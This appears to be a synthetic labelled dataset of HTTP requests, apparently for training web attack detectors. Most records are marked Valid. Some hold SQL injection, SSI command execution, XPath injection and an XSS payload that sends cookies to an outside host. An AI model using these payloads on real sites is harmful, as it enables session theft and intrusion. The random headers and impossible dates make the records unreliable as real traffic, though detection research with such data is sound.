Date: Wed, 07 Oct 09 16:11:00 GMT
ETag: W/"xKFW-j1z9TO2uu_"
Expect: erdoHdf3=esho
From: 3toI@brgto.it
If-Modified-Since: Mon, 19 Nov 07 09:18:23 UTC
If-Unmodified-Since: Fri, 06 Jan 06 10:23:26 UTC
If-Match: *
If-None-Match: "Al@SE_s1vPUXXDznO"
If-Range: Mon, 20 Oct 08 20:49:12 UTC
Max-Forwards: 3
MIME-Version: 6.0
Pragma: ad=rfn
Proxy-Authorization: Digest opaque="o6eeA"
Authorization: Basic dWJhbDU6ZWZsdQ==
Range: 863-
Referer: /otrta.dll
TE: deflate;q=0.7,deflate;q=0.0
Trailer: Trailer
User-Agent: e7stshoiulRtiassmi
UA-CPU: PowerPC
UA-Disp: 406,021,8
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 6998x4175
Via: 7.3 232.40.211.194:2408, 3.2 www.eyoehb.js, 9.9 222.79.44.149:21099
Transfer-Encoding: qsdg
Upgrade: tymurm/5.9, hhlRo/9.6, b96s/9.5
Warning: 371 www.eesb7.jpeg "lhwt" "Wed, 24 Sep 08 21:43:43 GMT"
X-Forwarded-For: 145.243.54.100
X-Serial-Number: 2418413
----: ----------------
~~~~~: ~~~~~~~~~~

null

End - Id: 21317
Start - Id: 42185
class: SqlInjection
GET /htgymrihItp/jn5XAkPFCOSiSmMv/ti7ws/tethsf7ucfwrhaSaklxe/system6309otq/aO_U/nY7@on7DZIE.png?replaceKu8-J-Y=OR++%27lsea2ia%27++%3D+++N%27+++%27&omnhcn7heEe=628850 HTTP/1.1
Host: www.iE2lrsh.fr:8
Connection: close
Accept: audio/*, image/gif
Accept-Charset: windows-1251, iso-10646-ucs-2, windows-1251;q=0.9, gb2312;q=0.3, utf-8
Accept-Encoding: *
Accept-Language: cL-ncjkaes;q=0.5, en-2e
Cache-Control: min-fresh=080
Client-ip: 171.126.113.10
Cookie: nYxgXoK=guL-jA;neE=89021;m3Achwmbrio=03663;sestt54ti=lrhsit)a1aDswE sa05r;clesbe=oa9shguci
Cookie2: $Version="70"
Date: Wed, 24 May 06 24:59:29 CET
ETag: "VKFBYpcbywJ_iX8q6h."
Expect: 9fto=lKrtw;ieBn=ntteqL
From: tnetRvi@fedacee.com
If-Modified-Since: Sat, 01 Jan 05 22:48:47 UTC
If-Unmodified-Since: Thu, 15 Jul 04 05:23:05 GMT
If-Match: "0QUaAY9PTPx.rFLEA6"
If-None-Match: "Q.JY1@y803FlTFyiHki"
If-Range: *
Max-Forwards: 8
MIME-Version: 5.3
Pragma: enilr1it='uta'
Proxy-Authorization: Digest response="EDaFEE464Cd220549436Ba0ec5F670E1"
Authorization: tttnT asArsom=lnlse
Range: 1010-
Referer: /lahisb/oflnie/zii3/nosgmue/HAU65S.tar.gz
TE: gzip,trailers
Trailer: Proxy-Authorization
User-Agent: Mozilla/3.1 (compatible; simisb2n; Win 9x; ncaza)
UA-CPU: StrongARM
UA-Disp: 466,6159,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 124x5537
Via: wh3i86/8.6 84.214.31.249, 6.6 152.243.157.211
Transfer-Encoding: compress
Upgrade: ji40ad/7.5, ednwes/8.3, osi/1.7, eor/7.9
Warning: 601 194.137.96.43 "gotieoa7eticdpyar6l2" "Thu, 01 Mar 07 08:53:20 CET"
X-Forwarded-For: 229.231.134.44
X-Serial-Number: 41681316983855974
----: ---------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 42185
Start - Id: 40331
class: SSI
GET /eghelnoftiah/fzDfRdXlQ0fmGu6oUI/raigd2tlehP7oaitei/B-Rmetapr_6linkYctmpN/a0sgvaiaaeg/xoPcrn/GScbLkhl93EIQQ/hfwe/tj/pterf5s/aoP0.gif?On=rte&Shincludecat8@VH=%3C%21--+%23exec++++cmd%3D%22c%3A%5Cprogra%7E1%5Cwsloehybe%5CZtOAo%5CtdeVV.exe+d%3A%5Crabinnans%5Cwww.relilige.org%5Ct1onso%5Cdatabase.mdb++%2Fx+++++exporttofoxpro%22--%3E&tojseeiweya=rcu4%3Fehjiepug HTTP/1.0
Host: 202.221.155.23
Connection: uAly
Accept: image/jpeg, image/gif;q=0.4
Accept-Charset: windows-1253, iso-8859-4, isiri-3342
Accept-Encoding: 
Accept-Language: 9snrTf-etsd, ocoyno-Ceett, nnkqr0es-mh;q=0.3
Client-ip: 227.85.148.49
Cookie: h45odtir4c=894334;yre3eaakJyQm=4394;narNtC=c;nhSrecswcsqnT8=noeepkalrt3ao1
Date: Tue, 12 May 09 17:55:08 GMT
ETag: "-2SnMmPGNUPDo6afli"
If-Modified-Since: Tue, 03 Feb 09 19:11:07 UTC
If-None-Match: *
If-Range: "YK@2pHQeybGz5xlhns"
Max-Forwards: 85
MIME-Version: 0.7
Pragma: tplo0=alnen
Authorization: Basic RXdsYXBzOmFuM3c5bmRy
Referer: /iid1ghtR/er8mc/dapn/rdtbu0.php3
TE: deflate;q=0.6,gzip
User-Agent: Mozilla/1.5 (Machintosh; U; PPC Mac OS X 5.2; sz-a9; rv:0.9.9) Gecko/46840314
UA-Disp: 253,423,16
UA-Pixels: 6151x427
Transfer-Encoding: identity

null

End - Id: 40331
Start - Id: 284
class: Valid
GET /mochabMJ_locationLVGL82servicesq/iRprZ/iTVxjCEOF@HDtuh1y/l8U6qnrrwricen6og/asVo6elm9l/eixfb5-7m9z/erhrAit6l/eirnalirid/rfe-_qYiI/o0VXqy0EskDliDinwKB.exe? HTTP/1.0
Host: 0.111.20.15:80
Connection: close
Accept: */*;q=0.3
Accept-Charset: *;q=0.0
Accept-Encoding: identity;q=0.7, gzip;q=0.0, gzip;q=0.0
Accept-Language: eas-net, 9h8eetl-rdhNde, et-Nioo
Cache-Control: max-age=39747
Client-ip: 120.251.90.4
Cookie: RMsrtr2cmiFfso=Ncaw;laaSreseurEf=stoctn';jPBbetweeni=58513;jeiwi=itgtdc eb'nts+'Mo;t2YXn-lR=Imeab
Cookie2: $Version="143"
Date: Wed, 26 Mar 08 19:36:02 UTC
ETag: W/"lrwstR6DutkUBs8RtZ"
Expect: 100-continue
From: pwiyhge@ptiCb.uk
If-Modified-Since: Tue, 20 Jan 09 03:51:15 GMT
If-Unmodified-Since: Wed, 28 Apr 04 16:05:26 UTC
If-Match: "yvZuy-621M.I9.S."
If-None-Match: *
If-Range: Mon, 05 Apr 04 13:27:00 UTC
Max-Forwards: 6311
MIME-Version: 2.0
Pragma: da2o=i
Proxy-Authorization: Basic ZWN1ZWV0YWE6ZmVxZWU=
Authorization: Basic dUE5SW5lOmd1MWFS
Range: 45-32,65908-442586,1566-181
Referer: http://www.aeehnof.com/shist7/n1qtXoh.nsf
TE: trailers,deflate;q=0.3
Trailer: Expect
User-Agent: uSD3mcesMj (pStpvG; d1VBrX4-0; sKTmra)
UA-CPU: x86
UA-Disp: 8014,224,16
UA-OS: Windows 95
UA-Color: color16
UA-Pixels: 4622x2387
Via: aawdce/6.2 14.71.74.3, 8.2 201.204.104.19:610
Transfer-Encoding: daxIdt
Upgrade: tebn/9.4, 3ibv/4.5, nycr/6.1, nXrj/8.5
Warning: 239 90.93.107.75:167 "dstcs" 
X-Forwarded-For: 127.92.165.64
X-Serial-Number: 3817117496295
----: -----------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 284
Start - Id: 24714
class: Valid
GET /Etmop4ot0thokht2m2t/1qxfWX.DT@NCwX/uF/yYzWnXa/g72_qr.V8K2jctmI3S@n/rKUlQvNcmWODs26K/oaFl2rpphaOTloysno/sAkrai9f/coa1ehpyRstzioA/rH5hac-JTrf9MGcJ4cuZ.shtml?WLtQZ_L@CzM=awd9&Ww1exec=%2BuehuueurpsNN&tsti=eohS&tlIa=dn%2Fage%5Ctmetmnts HTTP/1.0
Host: 115.215.129.168
Connection: rhsEs
Accept: video/mpeg
Accept-Charset: ks_c_5601-1987
Accept-Encoding: 
Accept-Language: ecrra7N-eb, tteeahv-sesyg, 2nraljfn-a, 1cadool-t;q=0.0, llfsd-did
Cache-Control: min-fresh=577
Client-ip: 246.244.195.20
Cookie: nbne6=rchhomeU;ecnPvu1rAmts=t&i;yv9llhgt3rteaib=t74FdDb;8oct=i7peOservicesA
Cookie2: $Version="25"
Date: Wed, 16 Aug 06 12:42:14 GMT
ETag: W/"RhQK9iPTJL@dncaX8C"
Expect: gtk0wc
From: erIrtmn@egw1d.net
If-Modified-Since: Thu, 15 Dec 05 24:48:25 CET
If-Unmodified-Since: Sat, 31 May 08 23:21:26 UTC
If-Match: "Lv90q@RbxtG4MeZGMVr"
If-None-Match: *
If-Range: "Q1XFQzIoKqD9Jjn1QVp"
Max-Forwards: 764
MIME-Version: 6.5
Pragma: no-cache
Proxy-Authorization: NTLM YWJvdG5vbHJzdHNlbXJvZmlldTJkT2VnYWRSc1B5bzdlaWJodGNy
Authorization: NTLM b2Foa3RpbGNobnZuZXBpczFlbmVuam5ldG9kbmFNaW1rMW5h
Range: 3-
Referer: /2hmrIdre/tga6ilt/q3uk.jpeg
TE: gzip;q=0.5,chunked
Trailer: Date
User-Agent: sEK_AG http://www.idfy.be
UA-CPU: PowerPC
UA-Disp: 9340,8339,32
UA-OS: Win95
UA-Color: color8
UA-Pixels: 1017x8120
Via: 5.1 93.116.113.175, 7.9 102.226.10.74
Transfer-Encoding: identity
Upgrade: noohwb/5.0
Warning: 261 www.tddrisan.shtml:4608 "amni" 
X-Forwarded-For: 127.43.236.207
X-Serial-Number: 7759023411175915
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 24714
Start - Id: 26086
class: Valid
GET /tAlSDH@bZE/rx7BX/rx/iopen-/5v5k/cFU5.jpeg?fot=lfse&n1hroe9e3=ih&eayegdjswaaljwo=857928&t8iaeo=d4og%299%29%28l&ieeVjmtmcv0rue=584&8ii=%25w83s2wnna8&childAXg7dj=Elea&eeertnrtytzr=1qdn0rtd&ae7nt=0&yanar2hts=gn%5DiR&asnisNa=06262 HTTP/1.0
Host: www.h7et0hoHr.st
Connection: a9dtlP
Accept: video/mpeg;q=0.2, text/*;q=0.2, image/gif
Accept-Charset: *
Accept-Encoding: 
Accept-Language: *;q=0.9
Cache-Control: no-cache
Client-ip: 104.91.44.192
Cookie: sioRyebjwin=03487999;9Eodusqenkmius=21;rcytKWai5esPids=07083
Cookie2: $Version="409"
Date: Thu, 11 Feb 10 18:04:46 CET
ETag: W/"Ah9P9Ayn2qDQMSxHNwSr"
Expect: 100-continue
From: etnehlm@T8emrntb.be
If-Modified-Since: Sun, 27 Apr 08 17:49:17 UTC
If-Unmodified-Since: Tue, 08 Nov 05 19:04:16 UTC
If-Match: "GZ3d8vM69v5coBA"
If-None-Match: *
If-Range: *
Max-Forwards: 71
MIME-Version: 0.4
Pragma: nio3pha2=ba8le
Proxy-Authorization: Basic c0lkZGU2Omhvc1QzZQ==
Authorization: Basic cUxyb1VzOnRlb2x2RA==
Range: -41,2933-4708,1-5204
Referer: /dPyhii/Fe1ia.js
TE: chunked;q=0.3
Trailer: Proxy-Authorization
User-Agent: luEtCr (rjYsIM; wC-0ru; vl4J2Yu0H2)
UA-CPU: MIPS
UA-Disp: 5226,2357,32
UA-OS: WinNT
UA-Color: color8
UA-Pixels: 096x0326
Via: HTTP/9.8 www.tntmG.gif, 3.0 www.is3nyS1e.jpg
Transfer-Encoding: compress
Upgrade: haa/5.6, myonaa/2.5, aqteer/9.9, eigla/3.2, eeKt/1.9
Warning: 624 www.0t7ct.css "Ahem" 
X-Forwarded-For: 129.2.245.208
X-Serial-Number: 2954941169740591
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26086
Start - Id: 49411
class: XPathInjection
GET /54G4a/nAwBuZzRKeKflID/eadtahonfly/tyEcEL/arelwoewHre8hhun/uetRo3rlyp/iedroy3t43nkbl1oe0sc/i0xX/kh7CBAimgltRinputLIE8/Le53toeaIs/akBrwof1uatEaaxno.png?8lllne0sh8sn=3&.Iz@tLXIxW7E=eipnid%27++++or++++6++++%3C+++++count%28path%2Fchild%3A%3A*%29+++++or+++++%270sO%27%3D++%27&yeeAt3rhTnw=8851798&1PoaTtssutr=793&sdxrbpt6=nfperlRUttn&dliheiichhs=aeei&orohtrh8eun=56912808&ivueeI=3+le HTTP/1.1
Host: www.Wtidht.ch:8895
Connection: xRmr
Accept: */*
Accept-Charset: x-mac-roman, macintosh;q=0.1
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-cache
Client-ip: 93.18.190.156
Cookie: in692knqgY-S=nAt4jh3l;7elr4Afyjedabt=\h:Hnna|)56@stits]iu;tceao=$ewoeeehe whereEcmaildC;tqoh4srbl=am
Cookie2: $Version="677"
Date: Mon, 27 Jun 05 22:57:03 UTC
ETag: W/"rUzInsOwOf8G0X7o-"
Expect: a1tnai
From: 2etopwi@exrhsnpxt.org
If-Modified-Since: Sat, 27 Mar 04 09:12:39 CET
If-Unmodified-Since: Fri, 22 Dec 06 12:56:08 GMT
If-Match: *
If-None-Match: "E-nGSIqObLIpJjzc"
If-Range: Tue, 30 Dec 08 12:12:58 CET
Max-Forwards: 41
MIME-Version: 0.6
Pragma: no-cache
Proxy-Authorization: Basic bmhvaW9vOnR0bm9zdTY=
Authorization: o6hk nUnoo9=kdsnx
Range: 93-251960,-7919
Referer: http://tgdns.de/VeTAiiny/opauB/6wro/vhkfSuw8/nT0kt.mp3
TE: trailers,gzip
Trailer: Range
User-Agent: Mozilla/6.9 (compatible; 8tsbI; Solaris; we8lvn4t; tU2rtemoE; asflTtdS)
UA-CPU: StrongARM
UA-Disp: 422,204,32
UA-OS: Windows 98
UA-Color: color16
UA-Pixels: 334x4748
Via: 0.4 www.rnel.jpg, culrLe/8.7 131.60.168.121
Transfer-Encoding: compress
Upgrade: dec/5.5, 4kklt/1.7
Warning: 522 www.54hoek.jpeg "olttkenin" 
X-Forwarded-For: 151.48.131.243
X-Serial-Number: 812184590933752195
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49411
Start - Id: 47012
class: XSS
GET /mibnoPoiErs/2KLkDdG/rrte/zOu0kLXNTWKh/mY47xM0yiJSd2arJEzFn/7R9unscrti4co/gmzd82HAU3b_/w3/qKyeog8J1cBdLr9aymt3/CibHX07JZI/oj.jpeg?urYts2Dnepc=iR9&htRD=%26%3Cscript++++%3E%5Bdocument.location.replace+%28%27http%3A%2F%2Fwww.arratael.com%2Fcgi-bin%2Flaet.cgi%27%2Bdocument.cookie%29%3B%5D%3C%2Fscript%3E HTTP/1.1
Host: 32.105.99.82:80
Connection: keep-alive
Accept: */*;q=0.8
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.5
Accept-Language: *;q=0.4
Cache-Control: max-age=487
Client-ip: 18.81.58.217
Cookie: locationoybody-echoZkuidXo='lfle6gaatreb;vlm6esu5sR=1hcfizhwdr
Cookie2: $Version="07"
Date: Tue, 08 Sep 09 05:00:04 CET
ETag: W/"iBHbcwj83EfCfSa5F3W"
Expect: 3tsw=ktosi6aa
From: siiia@cge3.it
If-Modified-Since: Sun, 18 Nov 07 15:50:11 GMT
If-Unmodified-Since: Fri, 25 Feb 05 24:12:07 UTC
If-Match: *
If-None-Match: *
If-Range: Mon, 02 Jun 08 11:23:20 CET
Max-Forwards: 188
MIME-Version: 8.2
Pragma: no-cache
Proxy-Authorization: NTLM ZWV0YmV0Mm9iQW9DOGd5TmV4U3R4bXRZNnNhbGRlaG9Wdmk=
Authorization: Digest username="unbxdine"
Range: 5-22964
Referer: /s12tahr/neonaamt/2ontoa/d7rE/ega7si.js
TE: gzip;q=0.3,trailers
Trailer: Upgrade
User-Agent: Kafynfjcrtnrea3zu
UA-CPU: Sparc
UA-Disp: 175,1584,8
UA-OS: Linux
UA-Color: color16
UA-Pixels: 7231x6416
Via: Ais/6.2 55.196.188.47, 2.1 88.186.140.32
Transfer-Encoding: aoav
Upgrade: me2u/0.5, c1ltE/4.5, nttiep/4.6, nsse/9.4, npleer/2.6
Warning: 754 www.mve9l.gif "2v5wC34esds" 
X-Forwarded-For: 212.120.206.157
X-Serial-Number: 239527167
----: ------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 47012
Start - Id: 13751
class: Valid
GET /ecgsizQZ2/i@h0Dg2WvLEUf0o/osmrdntlMrcsCieagnid/2uFHKIM/aniGzhl/k1BDXu7W9uBe/mInb.php?tEee4=47298888&iu5poor=z&hic0TepMlptbnmg=2leg6Jp0nCR&wsWiNIfCtmp=659876&etnJt56o=025267&he=huV&liehgnspilzO=lbeouomob5ooA43r7i&ec=5473289&02aigztgisabpc=9565512738&UEeazN=29&itadhewjo=tEJCF1qw-%40hZ&hAd-logRtiu=group+byaz%5C&zstsoh=qettv0wn HTTP/1.1
Host: www.rhtkat.ch
Connection: close
Accept: */*;q=0.4
Accept-Charset: koi8-r, x-mac-cyrillic, cp-932;q=0.4, cp-950, windows-1255;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: no-store
Client-ip: 58.102.229.56
Cookie: Lttco=846;Fai4fabc0ahiked=ur;6sa=pscin;OKWUQkpdwhereC=4905;oyfeon7c=tHtPAf;shidEy=774486383
Cookie2: $Version="908"
Date: Tue, 24 Feb 04 19:40:01 CET
ETag: "7EGAWsyNqs6l79HTwfh"
Expect: a5oidQb=emahdise
From: gnhB9o@rfci.com
If-Modified-Since: Mon, 26 Apr 04 15:59:44 UTC
If-Unmodified-Since: Sat, 26 Mar 05 11:27:07 GMT
If-Match: *
If-None-Match: *
If-Range: "dxdsLswBrEU-v33r"
Max-Forwards: 60
MIME-Version: 4.8
Pragma: no-cache
Proxy-Authorization: Basic ZWk2NWE0YTpzdG9tZTJodA==
Authorization: IatDe xTagi4Sc=fistaxdu
Range: -876597,708-263,3085-
Referer: /els3d/tslf8ah.png
TE: trailers,trailers
Trailer: Cache-Control
User-Agent: ciWAa/9.5.9.9
UA-CPU: PowerPC
UA-Disp: 173,9492,32
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 6985x6776
Via: esrho/2.8 107.196.37.132:0
Transfer-Encoding: deflate
Upgrade: l4tt/6.1, gtIh/6.6, nsetrs/8.9, h1ehro/2.2
Warning: 820 www.uproeo.htm "Ianeee" 
X-Forwarded-For: 60.68.206.39
X-Serial-Number: 26172268
----: ------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~

null

End - Id: 13751
Start - Id: 2289
class: Valid
GET /jrousm1kn/2UenER5ehe/aauhrlmasScI/uzotieetetOasggthttd.png? HTTP/1.1
Host: 214.61.106.82
Connection: keep-alive
Accept: */*;q=0.4
Accept-Charset: *;q=0.1
Accept-Encoding: *;q=0.7
Accept-Language: *;q=0.0
Cache-Control: no-cache
Client-ip: 180.110.57.247
Cookie: hd4n6inen=m983VS;7n0roaebetyHboi=acl@zcnfxnetcata
Cookie2: $Version="971"
Date: Mon, 28 Jun 04 19:30:26 UTC
ETag: W/"lNqUNaPov_L-Lu5n"
Expect: 100-continue
From: aetpir@0smuinHo.ch
If-Modified-Since: Sun, 14 May 06 24:29:56 UTC
If-Unmodified-Since: Mon, 30 Mar 09 18:22:36 GMT
If-Match: "p92DIIXiQRgXcGtmIu"
If-None-Match: "GjlT1AZ1EV_CY98"
If-Range: "kB3dSZDxD3.YRVk"
Max-Forwards: 408
MIME-Version: 4.6
Pragma: no-cache
Proxy-Authorization: NTLM OHdjc2xva2VhcmVzZXNsMTNhc2FlM2x1Y2FyM2hhZXJjMlBl
Authorization: iuSil tlms=lSmdsiVg
Range: 737-
Referer: http://ay5hl.de/eHnare3e/e7gtia.avi
TE: chunked;q=0.3,gzip;q=0.5,trailers
Trailer: User-Agent
User-Agent: p5th/5.1.3.3.2
UA-CPU: 68000
UA-Disp: 090,2073,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 6264x742
Via: bdoh/2.1 19.241.198.36:28, HTTP/3.3 www.hstlo.js, 2.0 www.atRvE.shtml
Transfer-Encoding: gzip
Upgrade: tjntna/3.8, spuo/6.9, tzncn/7.1, t2eh0/6.3
Warning: 647 238.244.132.185 "flrteahMclhsa" 
X-Forwarded-For: 191.123.48.69
X-Serial-Number: 61486796053346804
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~

null

End - Id: 2289
Start - Id: 33365
class: Valid
POST /tiuwLQEIi@AShvjsg6Ke/nftrhN6oesieentMr/eRUJk00Nj.bin? HTTP/1.1
Content-Length: 117
Content-Language: Otd,ed1eg,oto
Content-Encoding: gzip
Content-Location: /ay5o.asp
Content-MD5: TmV0eWVvZmVhcmdsczltUw==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 02 Dec 04 17:42:43 CET
Last-Modified: Tue, 17 Jul 07 08:03:09 GMT
Host: 37.196.63.22:80
Connection: keep-alive
Accept: application/*;q=0.6, text/*;q=0.5
Accept-Charset: cp-950, iso-8859-6, x-mac-icelandic, shift_jis
Accept-Encoding: *
Accept-Language: rium-splOl
Cache-Control: max-age=2566
Client-ip: 194.231.198.230
Cookie: 9eevin=r;Pl4tS_GU2Vn=ekpthshutdownol;je=59250;eevfReeeOfy=IHhqe;ontsndtat=;bOfrom0tenh
Cookie2: $Version="1"
Date: Sun, 27 Jan 08 19:17:13 UTC
ETag: "41ORVJECYg7W.bpT18U"
Expect: 100-continue
From: EinolCd@e1annaob6.gov
If-Modified-Since: Tue, 27 Apr 04 15:38:24 UTC
If-Unmodified-Since: Sat, 08 Nov 08 05:43:11 UTC
If-Match: *
If-None-Match: *
If-Range: Wed, 03 Oct 07 12:19:55 CET
Max-Forwards: 6905
MIME-Version: 5.3
Pragma: no-cache
Proxy-Authorization: Basic ZWlnck1oZXQ6eXNVbnZyZQ==
Authorization: Digest cnonce="Ets6nc"
Range: -6
Referer: /aeTSsust/btci/esdzrOa/rh0xe.cfm
TE: trailers,trailers
Trailer: Accept-Language
User-Agent: Mozilla/4.0 (compatible; nthXnjsd37; Unix; o6ed; 3trrejIw)
UA-CPU: MIPS
UA-Disp: 987,602,8
UA-OS: FreeBSD
UA-Color: color8
UA-Pixels: 2101x785
Via: FTP/0.2 225.124.59.85, 7.8 www.aqlfs.html, FTP/1.2 www.2cn9te.css
Transfer-Encoding: identity
Upgrade: eHsifo/4.6, g78t/9.8, eaiaee/4.0, yezrfl/2.3, e0h/0.5
Warning: 083 www.fspp3om.jpeg "iC94etihocgcee3e" 
X-Forwarded-For: 113.32.119.185
X-Serial-Number: 93235551323019151899
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

ta=90&02tdjtcsbl=a&nvieN=05&btls0femealm=4nx3X2&iawta=3E &bb=j&V-htpassBMfu=Nfi&kalfd=svtieyof5eupluhn&sea=okcfo-Z-Do

End - Id: 33365
Start - Id: 34564
class: Valid
PUT /OacceptWc9GSOlike@W6.js? HTTP/1.1
Content-Length: 206
Content-Language: vei3e,d,eet
Content-Encoding: gzip
Content-Location: http://www.twSyIc.biz/zOtr/Oaenee/wekukt/urqii.mp3
Content-MD5: N3Nub3dlcnJhc2x0ZTR0Tg==
Content-Type: application/x-www-form-urlencoded
Expires: Thu, 19 Jan 06 02:08:48 UTC
Last-Modified: Wed, 12 Jan 05 18:01:09 CET
Host: www.poars.com
Connection: keep-alive
Accept: text/*;q=0.8, text/*;q=0.4
Accept-Charset: windows-1252, windows-1257;q=0.1, euc-kr;q=0.6, x-mac-cyrillic;q=0.8
Accept-Encoding: gzip, gzip;q=0.6, deflate;q=0.8, gzip
Accept-Language: *;q=0.6
Cache-Control: no-transform
Client-ip: 172.87.226.168
Cookie: dsxtMftgS=l Anihosr(t';ceh=tRaYJovDo45;AmriteeenYanpe=0ttt:ht09
Cookie2: $Version="5"
Date: Thu, 03 Jun 04 07:52:37 UTC
ETag: "Tz5zi6SS0H-yjd@okIKF"
Expect: 100-continue
From: r4o9@ecoOy.ch
If-Modified-Since: Mon, 28 Sep 09 09:48:25 GMT
If-Unmodified-Since: Wed, 08 Oct 08 03:34:49 CET
If-Match: *
If-None-Match: *
If-Range: "nay.3oCiL3iD5KB6kjd"
Max-Forwards: 4
MIME-Version: 5.6
Pragma: j7=oefvF74
Proxy-Authorization: aueh h6ywlel=day6os
Authorization: Digest nc=252bEb7B
Range: -4597,119988-57606
Referer: http://WiLThtk.org/jram/anttitee.gif
TE: trailers,trailers
Trailer: Connection
User-Agent: Mozilla/3.6 (X11; U; Linux i386 5.0; ct-xq; rv:6.1.1) Gecko/33365774
UA-CPU: Sparc
UA-Disp: 225,732,32
UA-OS: Windows 95
UA-Color: color8
UA-Pixels: 811x2979
Via: 8.1 www.tg2nhae.html, 5.9 168.82.94.27, 2.5 80.253.232.71
Transfer-Encoding: gzip
Upgrade: aaee/2.3, sryou/1.6, tsu7z/2.8
Warning: 255 www.p5msr.tiff:10 "hpA8iaYfstbseet" 
X-Forwarded-For: 178.146.180.28
X-Serial-Number: 26405487538799285497
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

tnwiSrfcp9seht=btwTh&ewiizlai=Wcbuhtexoe&5so=642257&igamt=n3dLw&amnexjgufhc=nlrG3bm&in6E=ex oc&cctsuenf=nmhqx&oh6seide26lot=aKhui&ad=413&deesf=rr5ojV4&cedoyCeSwhysdtS=lrEghenaA&ei=02336114&stdInqOr=nmoGoOUj

End - Id: 34564
Start - Id: 30955
class: Valid
GET /e1d8eqyeuasu4ttjy3y5/stmpZuxmlivpPTwgetST/nhrsmnen9ese6ylfrmu/aoeacsIkd/nTsdhQw.png?snojaTs=eh&deiedN=oefiE2toEei&bdrop7V=eMeaeoroeeget45&geemtov=o3n1&lsToaAst=5196504&6bij=S36ceaq3iahreip&ypzr=%3Bin%3F%2Bhv&Iac0Tsnblsn=%40 HTTP/1.0
Host: 164.158.119.101
Connection: keep-alive
Accept: */*
Accept-Charset: *
Accept-Encoding: compress
Accept-Language: rrrae-seeA, g-b8, s-meR;q=0.4, s-SieavhD
Cache-Control: no-transform
Client-ip: 83.148.36.70
Cookie: ajNbGX=a9;yhrhoufi=samohoaa4eiframeTh3;4weJtdEtuqq=2276638;toa5lYmm=1354106;ejyejclRokihis=745
Cookie2: $Version="654"
Date: Mon, 11 Jan 10 23:03:20 GMT
ETag: W/"CpTXQ611eV3t0JsHXPo4"
Expect: Whtamtlo=e0nh;iikcteo
From: 2teoy3o@9tooecavin.be
If-Modified-Since: Mon, 12 Jul 04 04:38:18 CET
If-Unmodified-Since: Tue, 25 May 04 03:28:11 CET
If-Match: *
If-None-Match: *
If-Range: Thu, 25 May 06 22:46:18 GMT
Max-Forwards: 9772
MIME-Version: 1.3
Pragma: no-cache
Proxy-Authorization: NTLM aWhhb25kZWVUYXNjaGlmaHRtUzhEdHVycjJzdG5vcHh3bmVob2hhOW1ScmRv
Authorization: Digest opaque="slHs5t"
Range: -73
Referer: http://www.lIeh.net/hezsnis/9eisbir.pl
TE: deflate;q=0.8,trailers
Trailer: Range
User-Agent: Mtdwctr (nlnY0n; 7X.d8.; sNlSfeXh@)
UA-CPU: PowerPC
UA-Disp: 0407,7003,16
UA-OS: Win98
UA-Color: color8
UA-Pixels: 454x053
Via: 0.1 www.4tneue.css, 2.0 www.eoec7uo.png:9307
Transfer-Encoding: po7a
Upgrade: ehia/0.0, eN7b/7.6
Warning: 912 www.svdVuoCG.jpg "fhodof" "Sat, 09 May 09 20:18:55 CET"
X-Forwarded-For: 34.220.136.254
X-Serial-Number: 17732280940641123
----: -------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 30955
Start - Id: 31465
class: Valid
GET /9jBKAazV.cfm?a1Eaapo=qosxwmailSeruoznoU-oi+i&oEheytt7sog4n=W HTTP/1.1
Host: 245.9.106.152
Connection: owjih
Accept: video/mpeg, image/*;q=0.2, text/*;q=0.3
Accept-Charset: iso-8859-8-i;q=0.7, euc-jp, iso-8859-2;q=0.5
Accept-Encoding: 
Accept-Language: *;q=0.6
Cache-Control: ap2Leh='ayhno'
Client-ip: 25.155.170.173
Cookie: Or=1ec4cfmhhavingt%
Cookie2: $Version="683"
Date: Sun, 25 May 08 13:44:42 UTC
ETag: "9xymynxfEbpm3yxYm"
Expect: 7rclau
From: gdf9c@jueelrawg9.de
If-Modified-Since: Tue, 25 May 04 14:31:00 CET
If-Unmodified-Since: Fri, 24 Feb 06 10:20:01 GMT
If-Match: "GLlm.1GtUh.pX2xVlZ"
If-None-Match: ".QSyQT9w0Ey7SrGkSE"
If-Range: Thu, 07 Dec 06 07:07:44 UTC
Max-Forwards: 7
MIME-Version: 2.0
Pragma: ib=aeeC2
Proxy-Authorization: Basic VHJhcm1ueGE6bmRlZDZsM3U=
Authorization: Basic aWhlczpFZGxiZWN0Yg==
Range: 024-703,-943,-1578
Referer: http://www.aymttaer.biz/sosidze/apna4lo.mdb
TE: chunked
Trailer: Transfer-Encoding
User-Agent: 5YuBgQKF9a http://www.cdit.uk
UA-CPU: Sparc
UA-Disp: 7523,3452,32
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 389x351
Via: 2.9 www.Kemuc.shtml
Transfer-Encoding: compress
Upgrade: nru/5.8, ett/0.4, tbh9/3.1
Warning: 701 www.eidmrek.tiff "nxaiehq8edtge" "Sat, 02 Jul 05 03:49:42 CET"
X-Forwarded-For: 187.213.56.17
X-Serial-Number: 1337403720563308
----: --------------------------------------------
~~~~~: ~~~~~~~~~~~~~

